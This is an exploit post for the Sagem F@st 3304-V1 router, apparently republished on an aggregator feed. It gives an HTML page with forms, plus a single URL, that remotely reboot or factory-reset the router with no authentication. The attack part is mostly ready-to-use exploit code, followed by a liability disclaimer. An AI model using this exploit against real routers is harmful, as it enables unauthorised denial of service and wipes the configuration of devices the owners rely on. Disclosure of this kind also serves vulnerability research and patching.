Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Sagem Fast 3304-V1 - DoS Vulnerability

$
0
0
# Title              : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage    : http://www.sagemcom.com
# Tested on          : Firefox, Google Chrome
# Tested Router      : Sagem F@st 3304-V1
# Date               : 2014-07-26
# Author             : Z3ro0ne
# Contact            : saadousfar59@gmail.com
# Facebook Page      : https://www.facebook.com/Z3ro0ne

# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:

<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
    <INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
  </FORM>
  <FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
    <INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
  </FORM>
</body>
</html>
Reset to factory configuration :
--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar




//The information contained within this publication is


//supplied "as-is"with no warranties or guarantees of fitness


//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts


//responsibility for any damage caused by the use or misuse of


//this information




Viewing all articles
Browse latest Browse all 8064

Trending Articles